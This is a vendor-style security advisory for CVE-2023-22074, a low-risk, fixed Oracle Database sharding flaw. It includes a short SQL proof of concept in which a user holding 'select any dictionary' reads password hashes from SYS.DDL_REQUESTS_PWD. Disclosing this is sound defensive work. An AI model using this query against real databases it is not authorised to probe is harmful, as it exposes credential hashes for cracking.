Title: CVE-2023-22074 โ€“ Oracle database password hash exposure in sharding component  
Product: Database  
Manufacturer: Oracle  
Affected Version(s): 19c,21c [19.3-19.20 and 21.3-21.11]  
Tested Version(s): 19c  
Risk Level: Low  
Solution Status: Fixed  
CVE Reference: CVE-2023-22074  
Base Score: 2.4   
Author of Advisory: Emad Al-Mousa  
Vulnerability Details:  
Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Attacker compromising an account with create session and select any dictionary can view password hashes stored in a system table that is part of sharding component setup.  
Proof of Concept (PoC):  
I will create an account called โ€œjimโ€ in pluggable database ORCLPDB1 and grant the account create session and select any dictionary privilege:  
SQL> alter session set container=ORCLPDB1;  
Session altered.  
SQL> create user jim identified by jim123;  
User created.  
SQL> grant create session,select any dictionary to jim;  
Grant succeeded.  
I will now connect using database account โ€œjimโ€ and the account will be able to view the password hashes in system table DDL_REQUESTS_PWD used by database sharding component:  
sqlplus "jim/jim123"@ORCLPDB1  
SQL> show user  
USER is "JIM"  
SQL> select * from SYS.DDL_REQUESTS_PWD;  
---------- ----------  
123 445